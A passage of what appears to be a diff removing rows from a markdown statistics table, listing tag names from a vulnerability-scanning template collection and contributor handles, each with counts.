-| error | 7 | v0idc0de | 2 | | | | | | | -| avtech | 7 | joeldeleep | 2 | | | | | | | -| phpinfo | 7 | thezakman | 2 | | | | | | | -| samsung | 7 | koti2 | 2 | | | | | | | -| instrusive | 7 | ayadim | 2 | | | | | | | -| nagiosxi | 7 | g4l1t0 | 2 | | | | | | | -| hashicorp | 7 | randomdhiraj | 2 | | | | | | | -| blockchain | 7 | nytr0gen | 1 | | | | | | | -| facebook | 7 | f1she3 | 1 | | | | | | | -| squirrelmail | 7 | rivalsec | 1 | | | | | | | -| bigip | 7 | philippdelteil | 1 | | | | | | | -| discord | 7 | luqmaan hadia | 1 | | | | | | | -| maps | 7 | sttlr | 1 | | | | | | | -| servicenow | 6 | sinsinology | 1 | | | | | | | -| s3 | 6 | nuts7 | 1 | | | | | | | -| magmi | 6 | dhiyaneshdki | 1 | | | | | | | -| asp | 6 | aaronchen0 | 1 | | | | | | | -| flutterwave | 6 | ahmed abou-ela | 1 | | | | | | | -| liferay | 6 | natto97 | 1 | | | | | | | -| jetty | 6 | notwhy | 1 | | | | | | | -| cobbler | 6 | andirrahmani1 | 1 | | | | | | | -| cockpit | 6 | infosecsanyam | 1 | | | | | | | -| jeecg | 6 | c4sper0 | 1 | | | | | | | -| opensis | 6 | willd96 | 1 | | | | | | | -| 74cms | 6 | am0nt31r0 | 1 | | | | | | | -| doctor-appointment-system | 6 | kagamigawa | 1 | | | | | | | -| lucee | 6 | 1nf1n7y | 1 | | | | | | | -| sonarqube | 6 | rojanrijal | 1 | | | | | | | -| slack | 6 | tirtha | 1 | | | | | | | -| fpd | 6 | kiransau | 1 | | | | | | | -| webmin | 6 | 0xceba | 1 | | | | | | | -| openvpn | 6 | fq_hsu | 1 | | | | | | | -| plesk | 6 | jna1 | 1 | | | | | | | -| minio | 6 | bjxsec | 1 | | | | | | | -| zhiyuan | 6 | elmahdi | 1 | | | | | | | -| jamf | 6 | vzamanillo | 1 | | | | | | | -| database | 6 | paper-pen | 1 | | | | | | | -| elfinder | 6 | sshell | 1 | | | | | | | -| python | 6 | tangxiaofeng7 | 1 | | | | | | | -| newrelic | 6 | akash.c | 1 | | | | | | | -| tikiwiki | 6 | hexcat | 1 | | | | | | | -| keycloak | 6 | kishore krishna (sillydaddy) | 1 | | | | | | | -| log | 6 | freakyclown | 1 | | | | | | | -| cacti | 6 | carrot2 | 1 | | | | | | | -| rfi | 6 | charanrayudu | 1 | | | | | | | -| geoserver | 6 | irshadahamed | 1 | | | | | | | -| mongodb | 6 | tim_koopmans | 1 | | | | | | | -| kubelet | 6 | lingtren | 1 | | | | | | | -| nexus | 6 | rodnt | 1 | | | | | | | -| leak | 6 | mubassirpatel | 1 | | | | | | | -| microstrategy | 6 | prettyboyaaditya | 1 | | | | | | | -| awstats | 5 | geraldino2 | 1 | | | | | | | -| rseenet | 5 | viniciuspereiras | 1 | | | | | | | -| asana | 5 | undefl0w | 1 | | | | | | | -| express | 5 | alexrydzak | 1 | | | | | | | -| papercut | 5 | pratik khalane | 1 | | | | | | | -| sftp | 5 | jbertman | 1 | | | | | | | -| web3 | 5 | luqmaan hadia | 1 | | | | | | | -| | | [luqiih](https://github.com/luqiih) | | | | | | | | -| tenda | 5 | arqsz | 1 | | | | | | | -| zzzcms | 5 | af001 | 1 | | | | | | | -| storage | 5 | tea | 1 | | | | | | | -| paypal | 5 | daffianfo | 1 | | | | | | | -| smb | 5 | sak1 | 1 | | | | | | | -| couchdb | 5 | liquidsec | 1 | | | | | | | -| xmlrpc | 5 | exploitation | 1 | | | | | | | -| firmware | 5 | affix | 1 | | | | | | | -| square | 5 | yuansec | 1 | | | | | | | -| avaya | 5 | colbyjack1134 | 1 | | | | | | | -| server | 5 | galoget | 1 | | | | | | | -| metinfo | 5 | jeya.seelan | 1 | | | | | | | -| sql | 5 | manasmbellani | 1 | | | | | | | -| resin | 5 | clment cruchet | 1 | | | | | | | -| tls | 5 | 0h1in9e | 1 | | | | | | | -| caucho | 5 | noah @thesubtlety | 1 | | | | | | | -| jupyter | 5 | thirukrishnan | 1 | | | | | | | -| linux | 5 | compr00t | 1 | | | | | | | -| jabber | 5 | iampritam | 1 | | | | | | | -| elastic | 5 | notsoevilweasel | 1 | | | | | | | -| gocd | 5 | y0no | 1 | | | | | | | -| moosocial | 5 | aron molnar | 1 | | | | | | | -| beyondtrust | 5 | official_blackhat13 | 1 | | | | | | | -| circarlife | 5 | miroslavsotak | 1 | | | | | | | -| info-leak | 5 | arr0way | 1 | | | | | | | -| akamai | 5 | dwbzn | 1 | | | | | | | -| fatpipe | 5 | dawid-czarnecki | 1 | | | | | | | -| openemr | 5 | aresx | 1 | | | | | | | -| vrealize | 5 | pepitoh | 1 | | | | | | | -| adminer | 5 | jonathanwalker | 1 | | | | | | | -| chanjet | 5 | akshansh | 1 | | | | | | | -| microfocus | 5 | elitebaz | 1 | | | | | | | -| dionaea | 5 | anon-artist | 1 | | | | | | | -| kkfileview | 5 | realexp3rt | 1 | | | | | | | -| hybris | 5 | dabla | 1 | | | | | | | -| avideo | 5 | barthy.koeln | 1 | | | | | | | -| carrental | 5 | chesterblue | 1 | | | | | | | -| jwt | 5 | youngpope | 1 | | | | | | | -| terramaster | 5 | hardik-rathod | 1 | | | | | | | -| apisix | 5 | herry | 1 | | | | | | | -| ethereum | 5 | qianbenhyu | 1 | | | | | | | -| typo3 | 5 | r3nz0 | 1 | | | | | | | -| bmc | 5 | b0rn2r00t | 1 | | | | | | | -| strapi | 5 | xeldax | 1 | | | | | | | -| parallels | 5 | d0rkerdevil | 1 | | | | | | | -| mysql | 5 | hanlaomo | 1 | | | | | | | -| gateway | 5 | mbmy | 1 | | | | | | | -| landray | 5 | joaonevess | 1 | | | | | | | -| flickr | 4 | remi gascou (podalirius) | 1 | | | | | | | -| thinkcmf | 4 | petergrifin | 1 | | | | | | | -| metabase | 4 | ndmalc | 1 | | | | | | | -| osint-archived | 4 | shreyapohekar | 1 | | | | | | | -| hongfan | 4 | spac3wh1te | 1 | | | | | | | -| mostracms | 4 | knassar702 | 1 | | | | | | | -| nosqli | 4 | sec_hawk | 1 | | | | | | | -| qdpm | 4 | majidmc2 | 1 | | | | | | | -| royalevent | 4 | erikowen | 1 | | | | | | | -| mantisbt | 4 | droberson | 1 | | | | | | | -| grav | 4 | dmartyn | 1 | | | | | | | -| metasploit | 4 | bughuntersurya | 1 | | | | | | | -| flatpress | 4 | pphuahua | 1 | | | | | | | -| nextjs | 4 | adrianmf | 1 | | | | | | | -| teamcity | 4 | cravaterouge | 1 | | | | | | | -| churchcrm | 4 | shifacyclewla | 1 | | | | | | | -| ebs | 4 | gboddin | 1 | | | | | | | -| axigen | 4 | myst7ic | 1 | | | | | | | -| bittrex | 4 | j33n1k4 | 1 | | | | | | | -| bitrix | 4 | pdp | 1 | | | | | | | -| heroku | 4 | xcapri | 1 | | | | | | | -| aspose | 4 | booboohq | 1 | | | | | | | -| seagate | 4 | evan rubinstien | 1 | | | | | | | -| info | 4 | jas37 | 1 | | | | | | | -| ampache | 4 | duty_1g | 1 | | | | | | | -| codeigniter | 4 | mantissts | 1 | | | | | | | -| httpd | 4 | marcio mendes | 1 | | | | | | | -| cve2007 | 4 | houdinis | 1 | | | | | | | -| confluent | 4 | wabafet | 1 | | | | | | | -| yeswiki | 4 | mass0ma | 1 | | | | | | | -| splunk | 4 | harshinsecurity | 1 | | | | | | | -| spark | 4 | act1on3 | 1 | | | | | | | -| springcloud | 4 | sorrowx3 | 1 | | | | | | | -| datadog | 4 | justmumu | 1 | | | | | | | -| elementor | 4 | petruknisme | 1 | | | | | | | -| roxy | 4 | rotemreiss | 1 | | | | | | | -| newstatpress | 4 | numan türle | 1 | | | | | | | -| puppet | 4 | lethargynavigator | 1 | | | | | | | -| consul | 4 | ransomsec | 1 | | | | | | | -| linkerd | 4 | cookiehanhoan | 1 | | | | | | | -| cnvd2022 | 4 | jrolf | 1 | | | | | | | -| mautic | 4 | ledoubletake | 1 | | | | | | | -| cloudflare | 4 | jteles | 1 | | | | | | | -| pega | 4 | qlkwej | 1 | | | | | | | -| easypost | 4 | drfabiocastro | 1 | | | | | | | -| shiro | 4 | mesaglio | 1 | | | | | | | -| sound4 | 4 | retr0 | 1 | | | | | | | -| zend | 4 | jaskaran | 1 | | | | | | | -| webshell | 4 | becivells | 1 | | | | | | | -| kevinlab | 4 | allenwest24 | 1 | | | | | | | -| goanywhere | 4 | elder tao | 1 | | | | | | | -| candidats | 4 | william söderberg @ withsecure | 1 | | | | | | | -| powerjob | 4 | revblock | 1 | | | | | | | -| zte | 4 | patralos | 1 | | | | | | | -| sugarcrm | 4 | retr02332 | 1 | | | | | | | -| telesquare | 4 | djoevanka | 1 | | | | | | | -| aura | 4 | co0nan | 1 | | | | | | | -| pie-register | 4 | yavolo | 1 | | | | | | | -| swagger | 4 | ohlinge | 1 | | | | | | | -| kibana | 4 | 0xrod | 1 | | | | | | | -| pixie | 4 | adamparsons | 1 | | | | | | | -| totolink | 4 | luqman | 1 | | | | | | | -| cve2005 | 4 | vinit989 | 1 | | | | | | | -| sysaid | 4 | bjhulst | 1 | | | | | | | -| froxlor | 4 | micha3lb3n | 1 | | | | | | | -| mostra | 4 | adnanekhan | 1 | | | | | | | -| telerik | 4 | rotembar | 1 | | | | | | | -| redmine | 4 | chetgan | 1 | | | | | | | -| artifactory | 4 | screamy | 1 | | | | | | | -| panos | 4 | th3r4id | 1 | | | | | | | -| password | 4 | p-l- | 1 | | | | | | | -| wcs | 4 | bywalks | 1 | | | | | | | -| wp-statistics | 4 | thelicato | 1 | | | | | | | -| dolibarr | 4 | axrk | 1 | | | | | | | -| stripe | 4 | flx | 1 | | | | | | | -| arcgis | 4 | nerrorsec | 1 | | | | | | | -| photo | 4 | unknown | 1 | | | | | | | -| openstack | 4 | naglis | 1 | | | | | | | -| centos | 4 | phyr3wall | 1 | | | | | | | -| mikrotik | 4 | kaizensecurity | 1 | | | | | | | -| sendgrid | 4 | husain | 1 | | | | | | | -| ems | 4 | viondexd | 1 | | | | | | | -| flink | 4 | matt miller | 1 | | | | | | | -| httpserver | 4 | alperenkesk | 1 | | | | | | | -| age-encryption | 4 | ahmetpergamum | 1 | | | | | | | -| harbor | 4 | jc175 | 1 | | | | | | | -| metersphere | 4 | professorabhay | 1 | | | | | | | -| dropbear | 4 | therealtoastycat | 1 | | | | | | | -| craftcms | 4 | ola456 | 1 | | | | | | | -| hpe | 4 | xshuden | 1 | | | | | | | -| hongdian | 4 | jub0bs | 1 | | | | | | | -| prtg | 4 | jaimin gondaliya | 1 | | | | | | | -| horde | 4 | 8authur | 1 | | | | | | | -| phppgadmin | 4 | secthebit | 1 | | | | | | | -| kingsoft | 4 | ahmed sherif | 1 | | | | | | | -| qnap | 4 | aringo-bf | 1 | | | | | | | -| casaos | 4 | evolutionsec | 1 | | | | | | | -| graylog | 4 | _harleo | 1 | | | | | | | -| mailchimp | 4 | abbas.heybati | 1 | | | | | | | -| phpjabber | 4 | amanrawat | 1 | | | | | | | -| moveit | 4 | ldionmarcil | 1 | | | | | | | -| voip | 4 | imhunterand | 1 | | | | | | | -| concrete | 4 | salts | 1 | | | | | | | -| mlflow | 4 | brabbit10 | 1 | | | | | | | -| jorani | 4 | aayush vishnoi | 1 | | | | | | | -| cnvd2019 | 4 | zinminphy0 | 1 | | | | | | | -| ldap | 4 | hazana | 1 | | | | | | | -| openfire | 4 | remonsec | 1 | | | | | | | -| aria | 4 | 0xtavian | 1 | | | | | | | -| f5 | 4 | b0yd | 1 | | | | | | | -| panabit | 4 | metascan | 1 | | | | | | | -| h3c | 4 | dale clarke | 1 | | | | | | | -| jellyfin | 4 | shiar | 1 | | | | | | | -| sentry | 4 | ooooooo_q | 1 | | | | | | | -| kentico | 4 | dali | 1 | | | | | | | -| wbce | 4 | hczdmr | 1 | | | | | | | -| gnuboard | 4 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| hoteldruid | 4 | jcockhren | 1 | | | | | | | -| rabbitmq | 4 | ipanda | 1 | | | | | | | -| finicity | 4 | push4d | 1 | | | | | | | -| search | 4 | httpvoid | 1 | | | | | | | -| postmessage | 4 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| pentaho | 4 | mah3sec_ | 1 | | | | | | | -| umbraco | 4 | yaser_s | 1 | | | | | | | -| spip | 3 | lamscun | 1 | | | | | | | -| twitter | 3 | mukundbhuva | 1 | | | | | | | -| purchase-order | 3 | 5up3r541y4n | 1 | | | | | | | -| superset | 3 | hotpot | 1 | | | | | | | -| dubbo | 3 | rubina119 | 1 | | | | | | | -| nortek | 3 | 2rs3c | 1 | | | | | | | -| fuelcms | 3 | kailashbohara | 1 | | | | | | | -| jeesns | 3 | exceed | 1 | | | | | | | -| hsphere | 3 | andysvints | 1 | | | | | | | -| cluster | 3 | aravind | 1 | | | | | | | -| nuget | 3 | patrick pirker | 1 | | | | | | | -| intercom | 3 | bad5ect0r | 1 | | | | | | | -| tautulli | 3 | lark lab | 1 | | | | | | | -| aruba | 3 | whynotke | 1 | | | | | | | -| saltstack | 3 | sicksec | 1 | | | | | | | -| grp | 3 | higor melgaço (eremit4) | 1 | | | | | | | -| etcd | 3 | couskito | 1 | | | | | | | -| wordfence | 3 | regala_ | 1 | | | | | | | -| geowebserver | 3 | alevsk | 1 | | | | | | | -| vercel | 3 | hakimkt | 1 | | | | | | | -| voipmonitor | 3 | zsusac | 1 | | | | | | | -| globalprotect | 3 | francescocarlucci | 1 | | | | | | | -| zendesk | 3 | _darrenmartyn | 1 | | | | | | | -| ueditor | 3 | mayankpandey01 | 1 | | | | | | | -| sitemap | 3 | ling | 1 | | | | | | | -| axway | 3 | yusakie | 1 | | | | | | | -| lighttpd | 3 | apt-mirror | 1 | | | | | | | -| gradle | 3 | shiva (strobes security) | 1 | | | | | | | -| getsimple | 3 | 0xprial | 1 | | | | | | | -| drawio | 3 | dievus | 1 | | | | | | | -| movable | 3 | pulsesecurity.co.nz | 1 | | | | | | | -| flexvnf | 3 | un-fmunozs | 1 | | | | | | | -| trendnet | 3 | luskabol | 1 | | | | | | | -| csrf | 3 | michael wedl | 1 | | | | | | | -| nuxtjs | 3 | amirmsafari | 1 | | | | | | | -| http | 3 | zandros0 | 1 | | | | | | | -| superadmin | 3 | jbaines-r7 | 1 | | | | | | | -| e-mobile | 3 | berkdusunur | 1 | | | | | | | -| clusterengine | 3 | pussycat0 | 1 | | | | | | | -| pypi | 3 | kresec | 1 | | | | | | | -| adiscon | 3 | jiheon-dev | 1 | | | | | | | -| postgresql | 3 | gpiechnik2 | 1 | | | | | | | -| rancher | 3 | ofjaaah | 1 | | | | | | | -| 3cx | 3 | shelld3v | 1 | | | | | | | -| influxdb | 3 | sherlocksecurity | 1 | | | | | | | -| selea | 3 | keni0k | 1 | | | | | | | -| synology | 3 | deena | 1 | | | | | | | -| juniper | 3 | guax1 | 1 | | | | | | | -| apollo | 3 | dk999 | 1 | | | | | | | -| dotcms | 3 | kba@sogeti_esec | 1 | | | | | | | -| glassfish | 3 | iphantasmic | 1 | | | | | | | -| nuuo | 3 | rschio | 1 | | | | | | | -| etsy | 3 | yashgoti | 1 | | | | | | | -| zeroshell | 3 | thabisocn | 1 | | | | | | | -| openwrt | 3 | fopina | 1 | | | | | | | -| matrix | 3 | ramkrishna sawant | 1 | | | | | | | -| cas | 3 | bartu utku sarp | 1 | | | | | | | -| copyparty | 3 | sickwell | 1 | | | | | | | -| webcam | 3 | w0tx | 1 | | | | | | | -| fileman | 3 | furkansenan | 1 | | | | | | | -| webkul-qloapps | 3 | mariam tariq | 1 | | | | | | | -| shell | 3 | rumble773 | 1 | | | | | | | -| postgres | 3 | daviey | 1 | | | | | | | -| securepoint | 3 | exid | 1 | | | | | | | -| eshop | 3 | danigoland | 1 | | | | | | | -| dos | 3 | aceseven (digisec360) | 1 | | | | | | | -| discourse | 3 | s1r1us | 1 | | | | | | | -| jitsi | 3 | jacalynli | 1 | | | | | | | -| afterlogic | 3 | calumjelrick | 1 | | | | | | | -| contentful | 3 | 0ut0fb4nd | 1 | | | | | | | -| openai | 3 | furkansayim | 1 | | | | | | | -| fanruan | 3 | intx0x80 | 1 | | | | | | | -| jfrog | 3 | kareemse1im | 1 | | | | | | | -| weiphp | 3 | mr. bobo hp | 1 | | | | | | | -| angular | 3 | hakluke | 1 | | | | | | | -| droneci | 3 | x6263 | 1 | | | | | | | -| chamilo | 3 | wlayzz | 1 | | | | | | | -| owncloud | 3 | piyushchhiroliya | 1 | | | | | | | -| ansible | 3 | win3zz | 1 | | | | | | | -| xxljob | 3 | udyz | 1 | | | | | | | -| rat | 3 | marcos_iaf | 1 | | | | | | | -| xerox | 3 | lady_bug | 1 | | | | | | | -| thruk | 3 | pjborah | 1 | | | | | | | -| dreambox | 3 | s1r1u5_ | 1 | | | | | | | -| casdoor | 3 | ramondunker | 1 | | | | | | | -| purchase-order-management-system | 3 | omarjezi | 1 | | | | | | | -| postman | 3 | adilsoybali | 1 | | | | | | | -| rocketchat | 3 | zhenwarx | 1 | | | | | | | -| tableau | 3 | kabirsuda | 1 | | | | | | | -| credential | 3 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| gibbon | 3 | toufik-airane | 1 | | | | | | | -| idrac | 3 | udinchan | 1 | | | | | | | -| osticket | 3 | ratnadip gajbhiye | 1 | | | | | | | -| carel | 3 | 0xh7ml | 1 | | | | | | | -| backdrop | 3 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| sony | 3 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| bigant | 3 | 0xteles | 1 | | | | | | | -| zerof | 3 | ok_bye_now | 1 | | | | | | | -| segment | 3 | jeya seelan | 1 | | | | | | | -| newsletter | 3 | 0xelkomy & c0nqr0r | 1 | | | | | | | -| ampps | 3 | arjunchandarana | 1 | | | | | | | -| pip | 3 | flag007 | 1 | | | | | | | -| kfm | 3 | zeyad azima | 1 | | | | | | | -| webmail | 3 | nagli | 1 | | | | | | | -| finecms | 3 | oscarintherocks | 1 | | | | | | | -| telegram | 3 | fpatrik | 1 | | | | | | | -| httpbin | 3 | bibeksapkota (sar00n) | 1 | | | | | | | -| payara | 3 | erethon | 1 | | | | | | | -| kyocera | 3 | thebinitghimire | 1 | | | | | | | -| circleci | 3 | zn9988 | 1 | | | | | | | -| actuator | 3 | igibanez | 1 | | | | | | | -| selenium | 3 | aaban solutions | 1 | | | | | | | -| netlify | 3 | bugvsme | 1 | | | | | | | -| listserv | 3 | b4uh0lz | 1 | | | | | | | -| thinfinity | 3 | topscoder | 1 | | | | | | | -| checkpoint | 3 | cbadke | 1 | | | | | | | -| clientid | 3 | 0xd0ff9 | 1 | | | | | | | -| dzzoffice | 3 | esonhugh | 1 | | | | | | | -| rubygems | 3 | open-sec | 1 | | | | | | | -| openbmcs | 3 | tehtbl | 1 | | | | | | | -| magnolia | 3 | mohammad reza omrani | | 1 | | | | | | | -| | | @omranisecurity | | | | | | | | -| webadmin | 3 | schniggie | 1 | | | | | | | -| buffalo | 3 | lixts | 1 | | | | | | | -| telnet | 3 | shankaracharya | 1 | | | | | | | -| octobercms | 3 | none | 1 | | | | | | | -| modem | 3 | borna nematzadeh | 1 | | | | | | | -| redash | 3 | bernardo rodrigues | 1 | | | | | | | -| | | @bernardofsr | | | | | | | | -| oos | 3 | omarkurt | 1 | | | | | | | -| mcafee | 3 | j3ssie/geraldino2 | 1 | | | | | | | -| d-link | 3 | ringo | 1 | | | | | | | -| monstra | 3 | carlosvieira | 1 | | | | | | | -| favicon | 3 | hlop | 1 | | | | | | | -| unifi | 3 | _c0wb0y_ | 1 | | | | | | | -| yii | 3 | k3rwin | 1 | | | | | | | -| proftpd | 3 | breno_css | 1 | | | | | | | -| subrion | 3 | opencirt | 1 | | | | | | | -| poms | 3 | ayadi | 1 | | | | | | | -| r-seenet | 3 | ph33rr | 1 | | | | | | | -| processwire | 3 | millermedia | 1 | | | | | | | -| empirecms | 3 | pry0cc | 1 | | | | | | | -| labkey | 3 | amnotacat | 1 | | | | | | | -| lansweeper | 3 | akokonunes | 1 | | | | | | | -| mailgun | 3 | technicaljunkie | 1 | | | | | | | -| piwigo | 3 | hateshape | 1 | | | | | | | -| itop | 3 | izn0u | 1 | | | | | | | -| axis2 | 3 | osamahamad | 1 | | | | | | | -| airtable | 3 | caon | 1 | | | | | | | -| figma | 3 | noobexploiter | 1 | | | | | | | -| petya | 3 | skylark-lab | 1 | | | | | | | -| netdata | 3 | fmunozs | 1 | | | | | | | -| pulsar | 3 | juicypotato1 | 1 | | | | | | | -| env | 3 | unkl4b | 1 | | | | | | | -| webalizer | 3 | shivampand3y | 1 | | | | | | | -| openam | 3 | arall | 1 | | | | | | | -| lotus | 3 | sospiro | 1 | | | | | | | -| mapbox | 3 | elouhi | 1 | | | | | | | -| cnvd2023 | 3 | brianlam38 | 1 | | | | | | | -| epson | 3 | soyelmago | 1 | | | | | | | -| trixbox | 3 | vikas kundu | 1 | | | | | | | -| linksys | 3 | mhdsamx | 1 | | | | | | | -| electron | 3 | orpheus | 1 | | | | | | | -| dahua | 3 | unp4ck | 1 | | | | | | | -| webtareas | 3 | alex | 1 | | | | | | | -| pyload | 3 | ilovebinbash | 1 | | | | | | | -| mpsec | 3 | stupidfish | 1 | | | | | | | -| targa | 3 | danfaizer | 1 | | | | | | | -| nc | 3 | godfatherorwa | 1 | | | | | | | -| ixcache | 3 | makyotox | 1 | | | | | | | -| temenos | 3 | ynnirc | 1 | | | | | | | -| rackn | 3 | mabdullah22 | 1 | | | | | | | -| steve | 3 | ptonewreckin | 1 | | | | | | | -| sharefile | 3 | kchason | 1 | | | | | | | -| messaging | 3 | kurohost | 1 | | | | | | | -| flutter | 3 | nobody | 1 | | | | | | | -| fastly | 3 | pbuff07 | 1 | | | | | | | -| axis | 3 | xstp | 1 | | | | | | | -| rlm | 3 | arliya | 1 | | | | | | | -| fanwei | 3 | mrcl0wnlab | 1 | | | | | | | -| forum | 3 | queencitycyber | 1 | | | | | | | -| key | 3 | noamrathaus | 1 | | | | | | | -| mongo | 3 | blckraven | 1 | | | | | | | -| bruteforce | 3 | yashanand155 | 1 | | | | | | | -| yzmcms | 3 | higor melgaço | 1 | | | | | | | -| dom | 3 | pascalheidmann | 1 | | | | | | | -| samba | 3 | tirtha_mandal | 1 | | | | | | | -| e-cology | 3 | palanichamy_perumal | 1 | | | | | | | -| kavita | 3 | shockwave | 1 | | | | | | | -| waf | 3 | team syslifters / christoph | 1 | | | | | | | -| | | mahrl | | | | | | | | -| evlink | 3 | kr1shna4garwal | 1 | | | | | | | -| adafruit | 3 | miryangjung | 1 | | | | | | | -| self-hosted | 3 | pudsec | 1 | | | | | | | -| adb | 3 | davidfegyver | 1 | | | | | | | -| graph | 3 | manuelbua | 1 | | | | | | | -| digitalrebar | 3 | failopen | 1 | | | | | | | -| asus | 3 | lrtk-coder | 1 | | | | | | | -| aptus | 3 | matthew nickerson (b0than) @ | 1 | | | | | | | -| | | layer 8 security | | | | | | | | -| i3geo | 3 | juliosmelo | 1 | | | | | | | -| covenant | 3 | mihhailsokolov | 1 | | | | | | | -| loytec | 3 | narluin | 1 | | | | | | | -| sharepoint | 3 | 0xceeb | 1 | | | | | | | -| weather | 2 | nielsing | 1 | | | | | | | -| ubnt | 2 | h4kux | 1 | | | | | | | -| dpi | 2 | momen eldawakhly | 1 | | | | | | | -| submitty | 2 | chron0x | 1 | | | | | | | -| razorpay | 2 | kiks7 | 1 | | | | | | | -| novnc | 2 | xc1ym | 1 | | | | | | | -| tooljet | 2 | ruppde | 1 | | | | | | | -| lms | 2 | dorkerdevil | 1 | | | | | | | -| aspcms | 2 | absshax | 1 | | | | | | | -| phpshowtime | 2 | th3.d1p4k | 1 | | | | | | | -| nextcloud | 2 | | | | | | | | | -| beanstalk | 2 | | | | | | | | | -| privesc | 2 | | | | | | | | | -| syslog | 2 | | | | | | | | | -| lenovo | 2 | | | | | | | | | -| sass | 2 | | | | | | | | | -| nps | 2 | | | | | | | | | -| frp | 2 | | | | | | | | | -| crates | 2 | | | | | | | | | -| adbhoney | 2 | | | | | | | | | -| sas | 2 | | | | | | | | | -| youtube | 2 | | | | | | | | | -| gitbook | 2 | | | | | | | | | -| draytek | 2 | | | | | | | | | -| globaldomains | 2 | | | | | | | | | -| qts | 2 | | | | | | | | | -| rosariosis | 2 | | | | | | | | | -| klr300n | 2 | | | | | | | | | -| embed | 2 | | | | | | | | | -| totemomail | 2 | | | | | | | | | -| havoc | 2 | | | | | | | | | -| hubspot | 2 | | | | | | | | | -| ntopng | 2 | | | | | | | | | -| tasmota | 2 | | | | | | | | | -| erxes | 2 | | | | | | | | | -| adivaha | 2 | | | | | | | | | -| cloudpanel | 2 | | | | | | | | | -| guacamole | 2 | | | | | | | | | -| beamer | 2 | | | | | | | | | -| terraform | 2 | | | | | | | | | -| testrail | 2 | | | | | | | | | -| office-webapps | 2 | | | | | | | | | -| optimizely | 2 | | | | | | | | | -| inspur | 2 | | | | | | | | | -| plastic | 2 | | | | | | | | | -| spider-event-calendar | 2 | | | | | | | | | -| seowon | 2 | | | | | | | | | -| redhat | 2 | | | | | | | | | -| commax | 2 | | | | | | | | | -| rackstation | 2 | | | | | | | | | -| raspap | 2 | | | | | | | | | -| myfactory | 2 | | | | | | | | | -| kettle | 2 | | | | | | | | | -| sequoiadb | 2 | | | | | | | | | -| monitoring | 2 | | | | | | | | | -| phpcollab | 2 | | | | | | | | | -| photo-gallery | 2 | | | | | | | | | -| default | 2 | | | | | | | | | -| epmm | 2 | | | | | | | | | -| yarn | 2 | | | | | | | | | -| neos | 2 | | | | | | | | | -| hospital | 2 | | | | | | | | | -| nasos | 2 | | | | | | | | | -| contao | 2 | | | | | | | | | -| ericsson | 2 | | | | | | | | | -| glowroot | 2 | | | | | | | | | -| runner | 2 | | | | | | | | | -| phuket-cms | 2 | | | | | | | | | -| eyesofnetwork | 2 | | | | | | | | | -| sensor | 2 | | | | | | | | | -| pypiserver | 2 | | | | | | | | | -| wdcloud | 2 | | | | | | | | | -| homematic | 2 | | | | | | | | | -| xenmobile | 2 | | | | | | | | | -| code42 | 2 | | | | | | | | | -| watchguard | 2 | | | | | | | | | -| esphome | 2 | | | | | | | | | -| webui | 2 | | | | | | | | | -| timekeeper | 2 | | | | | | | | | -| netsus | 2 | | | | | | | | | -| haproxy | 2 | | | | | | | | | -| imap | 2 | | | | | | | | | -| ourphp | 2 | | | | | | | | | -| wamp | 2 | | | | | | | | | -| rundeck | 2 | | | | | | | | | -| jumpserver | 2 | | | | | | | | | -| dokuwiki | 2 | | | | | | | | | -| pam | 2 | | | | | | | | | -| appwrite | 2 | | | | | | | | | -| sidekiq | 2 | | | | | | | | | -| karaf | 2 | | | | | | | | | -| mythic | 2 | | | | | | | | | -| woocommerce-for-japan | 2 | | | | | | | | | -| motorola | 2 | | | | | | | | | -| w3-total-cache | 2 | | | | | | | | | -| jquery | 2 | | | | | | | | | -| ws_ftp | 2 | | | | | | | | | -| appcms | 2 | | | | | | | | | -| paid-memberships-pro | 2 | | | | | | | | | -| myanimelist | 2 | | | | | | | | | -| hfs | 2 | | | | | | | | | -| kong | 2 | | | | | | | | | -| kylin | 2 | | | | | | | | | -| session | 2 | | | | | | | | | -| corebos | 2 | | | | | | | | | -| tileserver | 2 | | | | | | | | | -| appspace | 2 | | | | | | | | | -| portainer | 2 | | | | | | | | | -| ovirt | 2 | | | | | | | | | -| vsftpd | 2 | | | | | | | | | -| xceedium | 2 | | | | | | | | | -| svn | 2 | | | | | | | | | -| orchid | 2 | | | | | | | | | -| kkFileView | 2 | | | | | | | | | -| books | 2 | | | | | | | | | -| mssql | 2 | | | | | | | | | -| hjtcloud | 2 | | | | | | | | | -| ngrok | 2 | | | | | | | | | -| workspaceone | 2 | | | | | | | | | -| avantfax | 2 | | | | | | | | | -| u8-crm | 2 | | | | | | | | | -| dlp | 2 | | | | | | | | | -| supermicro | 2 | | | | | | | | | -| ghost | 2 | | | | | | | | | -| dotnetnuke | 2 | | | | | | | | | -| limesurvey | 2 | | | | | | | | | -| synopsys | 2 | | | | | | | | | -| bash | 2 | | | | | | | | | -| appsuite | 2 | | | | | | | | | -| wp-stats-manager | 2 | | | | | | | | | -| bitly | 2 | | | | | | | | | -| zblogphp | 2 | | | | | | | | | -| vigorconnect | 2 | | | | | | | | | -| tamronos | 2 | | | | | | | | | -| wampserver | 2 | | | | | | | | | -| openssh | 2 | | | | | | | | | -| wago | 2 | | | | | | | | | -| gryphon | 2 | | | | | | | | | -| linkedin | 2 | | | | | | | | | -| episerver | 2 | | | | | | | | | -| resourcespace | 2 | | | | | | | | | -| rsa | 2 | | | | | | | | | -| wordnik | 2 | | | | | | | | | -| 3dprint | 2 | | | | | | | | | -| hostheader-injection | 2 | | | | | | | | | -| hiveos | 2 | | | | | | | | | -| circontrol | 2 | | | | | | | | | -| relatedposts | 2 | | | | | | | | | -| algolia | 2 | | | | | | | | | -| rstudio | 2 | | | | | | | | | -| wapples | 2 | | | | | | | | | -| landesk | 2 | | | | | | | | | -| cocoon | 2 | | | | | | | | | -| spacelogic | 2 | | | | | | | | | -| xiaomi | 2 | | | | | | | | | -| opencart | 2 | | | | | | | | | -| places | 2 | | | | | | | | | -| leostream | 2 | | | | | | | | | -| ojs | 2 | | | | | | | | | -| bomgar | 2 | | | | | | | | | -| freeipa | 2 | | | | | | | | | -| gcp | 2 | | | | | | | | | -| chiyu | 2 | | | | | | | | | -| mdm | 2 | | | | | | | | | -| phpcli | 2 | | | | | | | | | -| smugmug | 2 | | | | | | | | | -| yapi | 2 | | | | | | | | | -| frontpage | 2 | | | | | | | | | -| tapestry | 2 | | 